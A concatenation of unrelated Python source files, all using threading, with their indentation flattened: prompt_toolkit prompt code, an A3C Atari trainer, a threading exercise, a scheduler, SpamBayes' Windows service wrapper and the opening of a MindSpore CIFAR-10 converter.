erase_when_done=erase_when_done,
reverse_vi_search_direction=True,
color_depth=lambda: self.color_depth,
# I/O.
input=self.input,
output=self.output)
# During render time, make sure that we focus the right search control
# (if we are searching). - This could be useful if people make the
# 'multiline' property dynamic.
'''
def on_render(app):
multiline = _true(self.multiline)
current_control = app.layout.current_control
if multiline:
if current_control == search_buffer_control:
app.layout.current_control = search_toolbar.control
app.invalidate()
else:
if current_control == search_toolbar.control:
app.layout.current_control = search_buffer_control
app.invalidate()
app.on_render += on_render
'''
return application
def _create_prompt_bindings(self):
"""
Create the KeyBindings for a prompt application.
"""
kb = KeyBindings()
handle = kb.add
default_focused = has_focus(DEFAULT_BUFFER)
@Condition
def do_accept():
return (not _true(self.multiline) and
self.app.layout.has_focus(DEFAULT_BUFFER))
@handle('enter', filter=do_accept & default_focused)
def _(event):
" Accept input when enter has been pressed. "
self.default_buffer.validate_and_handle()
@Condition
def readline_complete_style():
return self.complete_style == CompleteStyle.READLINE_LIKE
@handle('tab', filter=readline_complete_style & default_focused)
def _(event):
" Display completions (like Readline). "
display_completions_like_readline(event)
@handle('c-c', filter=default_focused)
def _(event):
" Abort when Control-C has been pressed. "
event.app.exit(exception=KeyboardInterrupt, style='class:aborting')
@Condition
def ctrl_d_condition():
""" Ctrl-D binding is only active when the default buffer is selected
and empty. """
app = get_app()
return (app.current_buffer.name == DEFAULT_BUFFER and
not app.current_buffer.text)
@handle('c-d', filter=ctrl_d_condition & default_focused)
def _(event):
" Exit when Control-D has been pressed. "
event.app.exit(exception=EOFError, style='class:exiting')
suspend_supported = Condition(suspend_to_background_supported)
@Condition
def enable_suspend():
return to_filter(self.enable_suspend)()
@handle('c-z', filter=suspend_supported & enable_suspend)
def _(event):
"""
Suspend process to background.
"""
event.app.suspend_to_background()
return kb
@contextlib.contextmanager
def _auto_refresh_context(self):
" Return a context manager for the auto-refresh loop. "
done = [False] # nonlocal
# Enter.
def run():
while not done[0]:
time.sleep(self.refresh_interval)
self.app.invalidate()
if self.refresh_interval:
t = threading.Thread(target=run)
t.daemon = True
t.start()
try:
yield
finally:
# Exit.
done[0] = True
def prompt(
self, message=None,
# When any of these arguments are passed, this value is overwritten
# for the current prompt.
default='', editing_mode=None,
refresh_interval=None, vi_mode=None, lexer=None, completer=None,
complete_in_thread=None, is_password=None, key_bindings=None,
bottom_toolbar=None, style=None, color_depth=None,
include_default_pygments_style=None, rprompt=None, multiline=None,
prompt_continuation=None, wrap_lines=None,
enable_history_search=None, search_ignore_case=None,
complete_while_typing=None, validate_while_typing=None,
complete_style=None, auto_suggest=None, validator=None,
clipboard=None, mouse_support=None, input_processors=None,
reserve_space_for_menu=None, enable_system_prompt=None,
enable_suspend=None, enable_open_in_editor=None,
tempfile_suffix=None, inputhook=None,
async_=False):
"""
Display the prompt. All the arguments are a subset of the
:class:`~.PromptSession` class itself.
This will raise ``KeyboardInterrupt`` when control-c has been pressed
(for abort) and ``EOFError`` when control-d has been pressed (for
exit).
:param async_: When `True` return a `Future` instead of waiting for the
prompt to finish.
"""
# Backup original settings.
backup = dict((name, getattr(self, name)) for name in self._fields)
# Take settings from 'prompt'-arguments.
for name in self._fields:
value = locals()[name]
if value is not None:
setattr(self, name, value)
if vi_mode:
self.editing_mode = EditingMode.VI
def restore():
" Restore original settings. "
for name in self._fields:
setattr(self, name, backup[name])
def run_sync():
with self._auto_refresh_context():
try:
self.default_buffer.reset(Document(self.default))
return self.app.run(inputhook=self.inputhook)
finally:
restore()
def run_async():
with self._auto_refresh_context():
try:
self.default_buffer.reset(Document(self.default))
result = yield From(self.app.run_async())
raise Return(result)
finally:
restore()
if async_:
return ensure_future(run_async())
else:
return run_sync()
@property
def editing_mode(self):
return self.app.editing_mode
@editing_mode.setter
def editing_mode(self, value):
self.app.editing_mode = value
def _get_default_buffer_control_height(self):
# If there is an autocompletion menu to be shown, make sure that our
# layout has at least a minimal height in order to display it.
if (self.completer is not None and
self.complete_style != CompleteStyle.READLINE_LIKE):
space = self.reserve_space_for_menu
else:
space = 0
if space and not get_app().is_done:
buff = self.default_buffer
# Reserve the space, either when there are completions, or when
# `complete_while_typing` is true and we expect completions very
# soon.
if buff.complete_while_typing() or buff.complete_state is not None:
return Dimension(min=space)
return Dimension()
def _get_prompt(self):
return to_formatted_text(self.message, style='class:prompt')
def _get_continuation(self, width, line_number, is_soft_wrap):
"""
Insert the prompt continuation.
:param width: The width that's available for the continuation (don't
exceed this).
:param line_number:
:param is_soft_wrap: True when we got a soft wrap here instead of a
hard line ending.
"""
prompt_continuation = self.prompt_continuation
if callable(prompt_continuation):
prompt_continuation = prompt_continuation(width, line_number, is_soft_wrap)
return to_formatted_text(
prompt_continuation, style='class:prompt-continuation')
def _get_arg_text(self):
arg = self.app.key_processor.arg
if arg == '-':
arg = '-1'
return [
('class:arg-toolbar', 'Repeat: '),
('class:arg-toolbar.text', arg)
]
def prompt(*a, **kw):
""" The global `prompt` function. This will create a new `PromptSession`
instance for every call. """
# Input and output arguments have to be passed to the 'PromptSession'
# class, not its method.
input = kw.pop('input', None)
output = kw.pop('output', None)
session = PromptSession(input=input, output=output)
return session.prompt(*a, **kw)
prompt.__doc__ = PromptSession.prompt.__doc__
def create_confirm_session(message, suffix=' (y/n) '):
"""
Create a `PromptSession` object for the 'confirm' function.
"""
assert isinstance(message, text_type)
bindings = KeyBindings()
@bindings.add('y')
@bindings.add('Y')
def yes(event):
session.default_buffer.text = 'y'
event.app.exit(result=True)
@bindings.add('n')
@bindings.add('N')
@bindings.add('c-c')
def no(event):
session.default_buffer.text = 'n'
event.app.exit(result=False)
@bindings.add(Keys.Any)
def _(event):
" Disallow inserting other text. "
pass
complete_message = merge_formatted_text([message, suffix])
session = PromptSession(complete_message, key_bindings=bindings)
return session
def confirm(message='Confirm?', suffix=' (y/n) '):
"""
Display a confirmation prompt that returns True/False.
"""
session = create_confirm_session(message, suffix)
return session.prompt()
|
run_A3C.py | import threading
import multiprocessing
import numpy as np
import os
import random
#import matplotlib.pyplot as plt
import tensorflow as tf
import tensorflow.contrib.slim as slim
import scipy.signal
from scipy.misc import imresize
import gym
from gym import wrappers
from atari_wrappers import *
from dqn_utils import *
from random import choice
from time import sleep
from time import time
GLOBAL_STEP = 0
# Copies one set of variables to another.
# Used to set worker network parameters to those of global network.
def update_target_graph(from_scope,to_scope):
from_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, from_scope)
to_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, to_scope)
op_holder = []
for from_var,to_var in zip(from_vars,to_vars):
op_holder.append(to_var.assign(from_var))
return op_holder
def process_frame(image):
image = np.reshape(image,[np.prod(image.shape)]) / 255.0
return image
'''
def process_frame(image, new_HW=(84, 84), height_range=(35, 193), bg=(144, 72, 17)):
"""Returns a preprocessed image
(1) Crop image (top and bottom)
(2) Remove background & grayscale
(3) Reszie to smaller image
Args:
image (3-D array): (H, W, C)
new_HW (tuple): New image size (height, width)
height_range (tuple): Height range (H_begin, H_end) else cropped
bg (tuple): Background RGB Color (R, G, B)
Returns:
image (3-D array): (H, W, 1)
"""
image = crop_image(image, height_range)
image = resize_image(image, new_HW)
image = kill_background_grayscale(image, bg)
image = np.expand_dims(image, axis=2)
image = np.reshape(image,[np.prod(image.shape)]) / 255.0
return image
def resize_image(image, new_HW):
"""Returns a resized image
Args:
image (3-D array): Numpy array (H, W, C)
new_HW (tuple): Target size (height, width)
Returns:
image (3-D array): Resized image (height, width, C)
"""
return imresize(image, new_HW, interp="nearest")
def crop_image(image, height_range=(35, 195)):
"""Crops top and bottom
Args:
image (3-D array): Numpy image (H, W, C)
height_range (tuple): Height range between (min_height, max_height)
will be kept
Returns:
image (3-D array): Numpy image (max_H - min_H, W, C)
"""
h_beg, h_end = height_range
return image[h_beg:h_end, ...]
def kill_background_grayscale(image, bg):
"""Make the background 0
Args:
image (3-D array): Numpy array (H, W, C)
bg (tuple): RGB code of background (R, G, B)
Returns:
image (2-D array): Binarized image of shape (H, W)
The background is 0 and everything else is 1
"""
H, W, _ = image.shape
R = image[..., 0]
G = image[..., 1]
B = image[..., 2]
cond = (R == bg[0]) & (G == bg[1]) & (B == bg[2])
image = np.zeros((H, W))
image[~cond] = 1
return image
'''
# Discounting function used to calculate discounted returns.
def discount(x, gamma):
return scipy.signal.lfilter([1], [1, -gamma], x[::-1], axis=0)[::-1]
#Used to initialize weights for policy and value output layers
def normalized_columns_initializer(std=1.0):
def _initializer(shape, dtype=None, partition_info=None):
out = np.random.randn(*shape).astype(np.float32)
out *= std / np.sqrt(np.square(out).sum(axis=0, keepdims=True))
return tf.constant(out)
return _initializer
class AC_Network():
def __init__(self,s_size,a_size,scope,trainer):
with tf.variable_scope(scope):
#Input and visual encoding layers
self.inputs = tf.placeholder(shape=[None,s_size],dtype=tf.float32)
self.imageIn = tf.reshape(self.inputs,shape=[-1,84,84,1])
self.conv1 = slim.conv2d(activation_fn=tf.nn.elu,
inputs=self.imageIn,num_outputs=16,
kernel_size=[8,8],stride=[4,4],padding='VALID')
self.conv2 = slim.conv2d(activation_fn=tf.nn.elu,
inputs=self.conv1,num_outputs=32,
kernel_size=[4,4],stride=[2,2],padding='VALID')
hidden = slim.fully_connected(slim.flatten(self.conv2),256,activation_fn=tf.nn.elu)
#Recurrent network for temporal dependencies
lstm_cell = tf.contrib.rnn.BasicLSTMCell(256,state_is_tuple=True)
c_init = np.zeros((1, lstm_cell.state_size.c), np.float32)
h_init = np.zeros((1, lstm_cell.state_size.h), np.float32)
self.state_init = [c_init, h_init]
c_in = tf.placeholder(tf.float32, [1, lstm_cell.state_size.c])
h_in = tf.placeholder(tf.float32, [1, lstm_cell.state_size.h])
self.state_in = (c_in, h_in)
rnn_in = tf.expand_dims(hidden, [0])
step_size = tf.shape(self.imageIn)[:1]
state_in = tf.contrib.rnn.LSTMStateTuple(c_in, h_in)
lstm_outputs, lstm_state = tf.nn.dynamic_rnn(
lstm_cell, rnn_in, initial_state=state_in, sequence_length=step_size,
time_major=False)
lstm_c, lstm_h = lstm_state
self.state_out = (lstm_c[:1, :], lstm_h[:1, :])
rnn_out = tf.reshape(lstm_outputs, [-1, 256])
#Output layers for policy and value estimations
self.policy = slim.fully_connected(rnn_out,a_size,
activation_fn=tf.nn.softmax,
weights_initializer=normalized_columns_initializer(0.01),
biases_initializer=None)
self.value = slim.fully_connected(rnn_out,1,
activation_fn=None,
weights_initializer=normalized_columns_initializer(1.0),
biases_initializer=None)
#Only the worker network need ops for loss functions and gradient updating.
if scope != 'global':
self.actions = tf.placeholder(shape=[None],dtype=tf.int32)
self.actions_onehot = tf.one_hot(self.actions,a_size,dtype=tf.float32)
self.target_v = tf.placeholder(shape=[None],dtype=tf.float32)
self.advantages = tf.placeholder(shape=[None],dtype=tf.float32)
self.responsible_outputs = tf.reduce_sum(self.policy * self.actions_onehot, [1])
#Loss functions
self.value_loss = 0.5 * tf.reduce_sum(tf.square(self.target_v - tf.reshape(self.value,[-1])))
self.entropy = - tf.reduce_sum(self.policy * tf.log(self.policy))
self.policy_loss = -tf.reduce_sum(tf.log(self.responsible_outputs)*self.advantages)
self.loss = 0.5 * self.value_loss + self.policy_loss - self.entropy * 0.01
#Get gradients from local network using local losses
local_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope)
self.gradients = tf.gradients(self.loss,local_vars)
self.var_norms = tf.global_norm(local_vars)
grads,self.grad_norms = tf.clip_by_global_norm(self.gradients,40.0)
#Apply local gradients to global network
global_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, 'global')
self.apply_grads = trainer.apply_gradients(zip(grads,global_vars))
class Worker():
def __init__(self,env,name,s_size,a_size,trainer,model_path,global_episodes):
self.name = "worker_" + str(name)
self.number = name
self.model_path = model_path
self.trainer = trainer
self.global_episodes = global_episodes
self.increment = self.global_episodes.assign_add(1)
self.episode_rewards = []
self.episode_lengths = []
self.episode_mean_values = []
if tf.gfile.Exists("/tmp/train_"+str(self.number)):
tf.gfile.DeleteRecursively("/tmp/train_"+str(self.number))
self.summary_writer = tf.summary.FileWriter("/tmp/train_"+str(self.number))
#Create the local copy of the network and the tensorflow op to copy global paramters to local network
self.local_AC = AC_Network(s_size,a_size,self.name,trainer)
self.update_local_ops = update_target_graph('global',self.name)
if self.name == 'worker_0':
env = wrappers.Monitor(env, './frames', force=True)
#End Doom set-up
self.env = env
def train(self,rollout,sess,gamma,lam,bootstrap_value):
rollout = np.array(rollout)
observations = rollout[:,0]
actions = rollout[:,1]
rewards = rollout[:,2]
next_observations = rollout[:,3]
values = rollout[:,5]
# Here we take the rewards and values from the rollout, and use them to
# generate the advantage and discounted returns.
# The advantage function uses "Generalized Advantage Estimation"
self.rewards_plus = np.asarray(rewards.tolist() + [bootstrap_value])
discounted_rewards = discount(self.rewards_plus,gamma)[:-1]
self.value_plus = np.asarray(values.tolist() + [bootstrap_value])
advantages = rewards + gamma * self.value_plus[1:] - self.value_plus[:-1]
advantages = discount(advantages,lam)
# Update the global network using gradients from loss
# Generate network statistics to periodically save
feed_dict = {self.local_AC.target_v:discounted_rewards,
self.local_AC.inputs:np.vstack(observations),
self.local_AC.actions:actions,
self.local_AC.advantages:advantages,
self.local_AC.state_in[0]:self.batch_rnn_state[0],
self.local_AC.state_in[1]:self.batch_rnn_state[1]}
v_l,p_l,e_l,g_n,v_n, self.batch_rnn_state,_ = sess.run([self.local_AC.value_loss,
self.local_AC.policy_loss,
self.local_AC.entropy,
self.local_AC.grad_norms,
self.local_AC.var_norms,
self.local_AC.state_out,
self.local_AC.apply_grads],
feed_dict=feed_dict)
return v_l / len(rollout),p_l / len(rollout),e_l / len(rollout), g_n,v_n
def work(self,max_episode_length,gamma,lam,sess,coord,saver):
global GLOBAL_STEP
episode_count = sess.run(self.global_episodes)
total_steps = 0
print ("Starting worker " + str(self.number))
best_mean_episode_reward = -float('inf')
with sess.as_default(), sess.graph.as_default():
while not coord.should_stop():
sess.run(self.update_local_ops)
episode_buffer = []
episode_values = []
episode_reward = 0
episode_step_count = 0
d = False
s = self.env.reset()
s = process_frame(s)
rnn_state = self.local_AC.state_init
self.batch_rnn_state = rnn_state
while not d:
GLOBAL_STEP += 1
#Take an action using probabilities from policy network output.
a_dist,v,rnn_state = sess.run([self.local_AC.policy,self.local_AC.value,self.local_AC.state_out],
feed_dict={self.local_AC.inputs:[s],
self.local_AC.state_in[0]:rnn_state[0],
self.local_AC.state_in[1]:rnn_state[1]})
a = np.random.choice(a_dist[0],p=a_dist[0])
a = np.argmax(a_dist == a)
s1, r, d, _ = self.env.step(a)
if d == False:
s1 = process_frame(s1)
else:
s1 = s
episode_buffer.append([s,a,r,s1,d,v[0,0]])
episode_values.append(v[0,0])
episode_reward += r
s = s1
total_steps += 1
episode_step_count += 1
# If the episode hasn't ended, but the experience buffer is full, then we
# make an update step using that experience rollout.
if len(episode_buffer) == 10 and d != True:
# Since we don't know what the true final return is, we "bootstrap" from our current
# value estimation.
v1 = sess.run(self.local_AC.value,
feed_dict={self.local_AC.inputs:[s],
self.local_AC.state_in[0]:rnn_state[0],
self.local_AC.state_in[1]:rnn_state[1]})[0,0]
v_l,p_l,e_l,g_n,v_n = self.train(episode_buffer,sess,gamma,lam,v1)
episode_buffer = []
sess.run(self.update_local_ops)
if d == True:
break
self.episode_rewards.append(episode_reward)
self.episode_lengths.append(episode_step_count)
self.episode_mean_values.append(np.mean(episode_values))
# Update the network using the episode buffer at the end of the episode.
if len(episode_buffer) != 0:
v_l,p_l,e_l,g_n,v_n = self.train(episode_buffer,sess,gamma,lam,0.0)
# Periodically save gifs of episodes, model parameters, and summary statistics.
if episode_count % 5 == 0 and episode_count != 0:
if self.name == 'worker_0' and episode_count % 5 == 0:
print('\n episode: ', episode_count, 'global_step:', GLOBAL_STEP, 'mean episode reward: ', np.mean(self.episode_rewards[-5:]))
print('mean episode value: ', np.mean(self.episode_mean_values[-5:]))
if episode_count % 100 == 0 and self.name == 'worker_0':
saver.save(sess,self.model_path+'/model-'+str(episode_count)+'.cptk')
print ("Saved Model")
mean_reward = np.mean(self.episode_rewards[-5:])
if episode_count > 20 and best_mean_episode_reward < mean_reward:
best_mean_episode_reward = mean_reward
mean_length = np.mean(self.episode_lengths[-5:])
mean_value = np.mean(self.episode_mean_values[-5:])
summary = tf.Summary()
summary.value.add(tag='Perf/Reward', simple_value=float(mean_reward))
summary.value.add(tag='Perf/Best_Reward', simple_value=float(best_mean_episode_reward))
summary.value.add(tag='Perf/Length', simple_value=float(mean_length))
summary.value.add(tag='Perf/Value', simple_value=float(mean_value))
summary.value.add(tag='Losses/Value Loss', simple_value=float(v_l))
summary.value.add(tag='Losses/Policy Loss', simple_value=float(p_l))
summary.value.add(tag='Losses/Entropy', simple_value=float(e_l))
summary.value.add(tag='Losses/Grad Norm', simple_value=float(g_n))
summary.value.add(tag='Losses/Var Norm', simple_value=float(v_n))
self.summary_writer.add_summary(summary, GLOBAL_STEP)
self.summary_writer.flush()
if self.name == 'worker_0':
sess.run(self.increment)
if episode_count%1==0:
print('\r {} {}'.format(episode_count, episode_reward),end=' ')
episode_count += 1
def get_env(task, seed):
env_id = task.env_id
env = gym.make(env_id)
#set seed
tf.set_random_seed(seed)
np.random.seed(seed)
random.seed(seed)
env.seed(seed)
env = wrap_deepmind(env)
return env
max_episode_length = 300
gamma = .99 # discount rate for advantage estimation and reward discounting
lam = 0.97 # GAE discount factor
s_size = 7056 # Observations are greyscale frames of 84 * 84 * 1
a_size = 3 # Agent can move Left, Right, or Fire
load_model = False
model_path = './model'
# Get Atari games.
benchmark = gym.benchmark_spec('Atari40M')
# Change the index to select a different game.
task = benchmark.tasks[3]
seed = 0 # Use a seed of zero (you may want to randomize the seed!)
tf.reset_default_graph()
if not os.path.exists(model_path):
os.makedirs(model_path)
env = get_env(task, seed)
#s_size = np.prod(env.observation_space.shape)
a_size = env.action_space.n
env.close()
global_episodes = tf.Variable(0,dtype=tf.int32,name='global_episodes',trainable=False)
trainer = tf.train.AdamOptimizer(learning_rate=0.0001)
master_network = AC_Network(s_size,a_size,'global',None) # Generate global network
num_workers = min(multiprocessing.cpu_count(), 8) # Set workers ot number of available CPU threads
print('--------{} threads are used--------'.format(num_workers))
workers = []
# Create worker classes
for i in range(num_workers):
env = get_env(task, seed)
workers.append(Worker(env,i,s_size,a_size,trainer,model_path,global_episodes))
saver = tf.train.Saver(max_to_keep=5)
with tf.Session() as sess:
coord = tf.train.Coordinator()
if load_model == True:
print ('Loading Model...')
ckpt = tf.train.get_checkpoint_state(model_path)
saver.restore(sess,ckpt.model_checkpoint_path)
else:
sess.run(tf.global_variables_initializer())
# This is where the asynchronous magic happens.
# Start the "work" process for each worker in a separate threat.
worker_threads = []
for worker in workers:
worker_work = lambda: worker.work(max_episode_length,gamma,lam,sess,coord,saver)
t = threading.Thread(target=(worker_work))
t.start()
sleep(0.5)
worker_threads.append(t)
coord.join(worker_threads) |
main.py | """
The same instance of FooBar will be passed to two different threads.
Thread A will call foo() while thread B will call bar().
Modify the given program to output "foobar" n times.
Example 1:
Input: n = 1
Output: "foobar"
Explanation:
There are two threads being fired asynchronously.
One of them calls foo(), while the other calls bar(). "foobar" is being output 1 time.
Example 2:
Input: n = 2
Output: "foobarfoobar"
Explanation: "foobar" is being output 2 times.
"""
import threading
class FooBar:
def __init__(self, n: int):
self.n = n
self.foo_mutex = threading.Lock()
self.bar_mutex = threading.Lock()
self.buffer = ""
self.bar_mutex.acquire()
def foo(self):
for _ in range(self.n):
self.foo_mutex.acquire()
self.buffer += "foo"
self.bar_mutex.release()
def bar(self):
for _ in range(self.n):
self.bar_mutex.acquire()
self.buffer += "bar"
self.foo_mutex.release()
def __repr__(self) -> str:
return self.buffer
def main():
f = FooBar(5)
t1 = threading.Thread(target=f.foo)
t2 = threading.Thread(target=f.bar)
t1.start()
t2.start()
t1.join()
t2.join()
print(f)
if __name__ == '__main__':
main() |
schedule.py | import time
import threading
class Schedule:
def __init__(self):
self.loop = True
def start(self, interval, func, wait=True):
base_time = time.time()
next_time = 0
while self.loop:
t = threading.Thread(target=func)
t.start()
if wait:
t.join()
next_time = ((base_time - time.time()) % interval) or interval
time.sleep(next_time)
def stop(self):
self.loop = False
|
pop3proxy_service.py | # Run the sb_server as a WinNT service. Should work on Windows 2000
# and Windows XP.
#
# * Install as a service using "pop3proxy_service.py install"
# * Start the service (Use Control Panel etc, or
# "pop3proxy_service.py start". Check the event
# log should anything go wrong.
# * To debug the service: "pop3proxy_service.py debug"
# Service then runs in the command prompt, showing all
# print statements.
# * To remove the service: "pop3proxy_service.py remove"
# This module is part of the spambayes project, which is Copyright 2002-2007
# The Python Software Foundation and is covered by the Python Software
# Foundation license.
# Originally written by Mark Hammond.
import os
import sys
import logging
import servicemanager
try:
servicemanager.LogInfoMsg(os.getcwd())
servicemanager.LogInfoMsg(__file__)
servicemanager.LogInfoMsg(sys.argv[0])
except:
pass
class ServiceEventLogHandler(logging.Handler):
"""Dispatches logging events to the win32 services event log.
Requires pywin32.
"""
import servicemanager
def emit(self, record):
"""Emit a record.
If a formatter is specified, it is used to format the record.
This record is then written to the win32 services event log,
with the type set to the appropriate type based on the level.
"""
try:
servicemgr = self.servicemanager
level = record.levelno
msg = self.format(record)
if level >= logging.ERROR:
servicemgr.LogErrorMsg(msg)
elif level >= logging.WARNING:
servicemgr.LogWarningMsg(msg)
elif level >= logging.INFO:
servicemgr.LogInfoMsg(msg)
elif level >= logging.DEBUG:
# What should we do with this? It's very low-level
# to be going into the log, but then it only gets
# added if the logger's level is set low enough.
# For now, nothing (absorb), and reconsider this
# when we are actually using the logging module properly.
pass
else:
# Really low; just absorb these for now.
pass
except:
self.handleError(record)
def handleError(self, record):
"""
Handle errors which occur during an emit() call.
sys.stderr does nowwhere, so redirect this into the event log, too.
"""
if raiseExceptions:
try:
import cStringIO as StringIO
except ImportError:
import StringIO
import traceback
ei = sys.exc_info()
msg = StringIO.StringIO()
traceback.print_exception(ei[0], ei[1], ei[2], None, msg)
msg.seek(0)
self.servicemanager.LogErrorMsg(msg)
del ei
class ServiceEventLogHandlerWrapper(object):
"""Pretend that the ServiceEventLogHandler is a file-like object,
so we can use it while we don't use the proper logging module."""
def __init__(self, service_name, level=logging.INFO):
self.log = ServiceEventLogHandler()
self.name = service_name
self.level = level
self.data = ""
def write(self, data):
# This could use the higher-up stuff, but don't for now.
# Buffer until newline.
self.data += data
if '\n' not in data:
return
# Skip blank lines
if not self.data.strip():
return
record = logging.LogRecord(self.name, self.level, "", "",
self.data, None, None)
self.log.emit(record)
self.data = ""
# Messages from pop3proxy will go nowhere when executed as a service
# Try and detect that print will go nowhere and redirect.
# redirect output somewhere useful when running as a service.
import win32api
try:
win32api.GetConsoleTitle()
except win32api.error:
# No console - if we are running from Python sources,
# redirect to win32traceutil, but if running from a binary
# install, redirect to the services event log.
# We used to redirect to log files (in the temp folder, in
# the form SpamBayesService%d.log), but that is apparently
# not necessarily a good place, so we moved to the official
# location.
# Want to move to logging module later, so for now, we
# hack together a simple logging strategy.
if hasattr(sys, "frozen"):
sys.stdout = ServiceEventLogHandlerWrapper("pop3proxy")
sys.stderr = ServiceEventLogHandlerWrapper("pop3proxy",
logging.ERROR)
else:
import win32traceutil
# If running from sources, patch up sys.path
if not hasattr(sys, "frozen"):
# We are in the 'spambayes\win32' directory. We
# need the parent on sys.path, so 'spambayes.spambayes' is a package,
# and 'pop3proxy' is a module
this_filename = __file__
sb_dir = os.path.dirname(os.path.dirname(this_filename))
sb_scripts_dir = os.path.join(sb_dir,"scripts")
sys.path.insert(0, sb_dir)
sys.path.insert(-1, sb_scripts_dir)
# and change directory here, so sb_server uses the correct
# config file etc
# If the "SpamBayesData" directory that we create exists, change to
# that, otherwise into the spambayes directory itself.
if os.path.exists(os.path.join(sb_dir, "SpamBayesData")):
os.chdir(os.path.join(sb_dir, "SpamBayesData"))
else:
os.chdir(sb_dir)
# Fix to handle problem if there is a zlib.dll in the SYSTEM32 directory.
# (The Python DLL directory must come before that in sys.path)
# This is a bit hackish, but shouldn't do any real harm.
from win32com.shell import shell, shellcon
sys32path = shell.SHGetFolderPath(0, shellcon.CSIDL_SYSTEM, 0, 0)
for path in sys.path[:-1]:
if path == sys32path:
sys.path.remove(path)
assert path not in sys.path, \
"Please remove multiple copies of windows\system32 in path"
sys.path.append(path) # put it at the *end*
del sys32path
del shell
del shellcon
del path
# Rest of the standard Python modules we use.
import traceback
import threading
import cStringIO
# The spambayes imports we need.
import sb_server
# The win32 specific modules.
import win32serviceutil, win32service
import pywintypes, win32con, winerror
from ntsecuritycon import *
class Service(win32serviceutil.ServiceFramework):
# The script name was changed to "sb_server" but I'll leave this as pop3proxy
# overwise people might accidently run two proxies.
_svc_name_ = "pop3proxy"
_svc_display_name_ = "SpamBayes Service"
_svc_deps_ = ['tcpip'] # We depend on the tcpip service.
def __init__(self, args):
win32serviceutil.ServiceFramework.__init__(self, args)
self.event_stopped = threading.Event()
self.event_stopping = threading.Event()
self.thread = None
def SvcStop(self):
self.ReportServiceStatus(win32service.SERVICE_STOP_PENDING)
self.event_stopping.set()
sb_server.stop()
def SvcDoRun(self):
import servicemanager
# Setup our state etc
try:
sb_server.prepare(can_stop=False)
except sb_server.AlreadyRunningException:
msg = "The SpamBayes proxy service could not be started, as "\
"another SpamBayes server is already running on this machine"
servicemanager.LogErrorMsg(msg)
errCode = winerror.ERROR_SERVICE_SPECIFIC_ERROR
self.ReportServiceStatus(win32service.SERVICE_STOPPED,
win32ExitCode=errCode, svcExitCode=1)
return
assert not sb_server.state.launchUI, "Service can't launch a UI"
# Start the thread running the server.
thread = threading.Thread(target=self.ServerThread)
thread.start()
# Write an event log record - in debug mode we will also
# see this message printed.
from spambayes.Options import optionsPathname
extra = " as user '%s', using config file '%s'" \
% (win32api.GetUserName(),
optionsPathname)
servicemanager.LogMsg(
servicemanager.EVENTLOG_INFORMATION_TYPE,
servicemanager.PYS_SERVICE_STARTED,
(self._svc_name_, extra)
)
try:
# Thread running - wait for the stopping event.
self.event_stopping.wait()
# Either user requested stop, or thread done - wait for it
# to actually stop, but reporting we are still alive.
# Wait up to 60 seconds for shutdown before giving up and
# exiting uncleanly - we wait for current proxy connections
# to close, but you have to draw the line somewhere.
for i in range(60):
self.ReportServiceStatus(win32service.SERVICE_STOP_PENDING)
self.event_stopped.wait(1)
if self.event_stopped.isSet():
break
print "The service is still shutting down..."
else:
# eeek - we timed out - give up in disgust.
print "The worker failed to stop - aborting it anyway"
except KeyboardInterrupt:
pass
# Write another event log record.
s = sb_server.state
status = " after %d sessions (%d ham, %d spam, %d unsure)" % \
(s.totalSessions, s.numHams, s.numSpams, s.numUnsure)
servicemanager.LogMsg(
servicemanager.EVENTLOG_INFORMATION_TYPE,
servicemanager.PYS_SERVICE_STOPPED,
(self._svc_name_, status)
)
def ServerThread(self):
try:
try:
sb_server.start()
except SystemExit:
# user requested shutdown
print "pop3proxy service shutting down due to user request"
except:
# Otherwise an error we should log.
ob = cStringIO.StringIO()
traceback.print_exc(file=ob)
message = "The pop3proxy service failed with an " \
"unexpected error\r\n\r\n" + ob.getvalue()
# print it too, so any other log we have gets it.
print message
# Log an error event to the event log.
import servicemanager
servicemanager.LogErrorMsg(message)
finally:
self.event_stopping.set()
self.event_stopped.set()
if __name__=='__main__':
if "install" in sys.argv:
# Installing the service also creates a directory (if it does not
# already exist) in which the data will be placed, unless an
# existing configuration file can be found.
from spambayes.Options import optionsPathname
if not os.path.exists(optionsPathname):
data_directory = os.path.join(os.path.dirname(sys.argv[0]),
"..", "SpamBayesData")
data_directory = os.path.abspath(data_directory)
if not os.path.exists(data_directory):
print "Creating data directory at", data_directory
os.makedirs(data_directory)
win32serviceutil.HandleCommandLine(Service)
|
cifar10_to_mr.py | # Copyright 2019 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""
Cifar10 convert tool for MindRecord.
"""
from importlib import import_module
import os
import numpy as np
from mindspore import log as logger
from .cifar10 import Cifar10
from ..common.exceptions import PathNotExistsError
from ..filewriter import FileWriter
from ..shardutils import check_filename, ExceptionThread, SUCCESS, FAILED
try:
cv2 = import_module("cv2")
except ModuleNotFoundError:
cv2 = None
__all__ = ['Cifar10ToMR']
class Cifar10ToMR:
"""
A class to transform from cifar10 to MindRecord.
Note:
For details about Examples, please refer to `Converting the CIFAR-10 Dataset <https://
www.mindspore.cn/tutorials/zh-CN/master/advanced/dataset/record.html#converting-the-cifar-10-dataset>`_.
Args:
source (str): The cifar10 directory to be transformed.
destination (str): MindRecord file path to transform into, ensure that no file with the same name
exists in the directory.
Raises:
ValueError: If source or destination is invalid.
"""
def __init__(self, source, destination):
check_filename(source)
self.source = source
files = os.listdir(self.source)
train_data_flag = False
test_data_flag = False
for file in files:
if file.startswith("data_batch_"):
train_data_flag = True
if file.startswith("test_batch"):
test_data_flag = True
if not train_data_flag:
raise PathNotExistsError("data_batch_*")
if not test_data_flag:
raise PathNotExistsError("test_batch")
check_filename(destination)
self.destination = destination
self.writer = None
def run(self, fields=None):
"""
Execute transformation from cifar10 to MindRecord.
Args:
fields (list[str], optional): A list of index fields. Default: None.
Returns:
MSRStatus, SUCCESS or FAILED.
"""
if fields and not isinstance(fields, list):
raise ValueError("The parameter fields should be None or list")
cifar10_data = Cifar10(self.source, False)
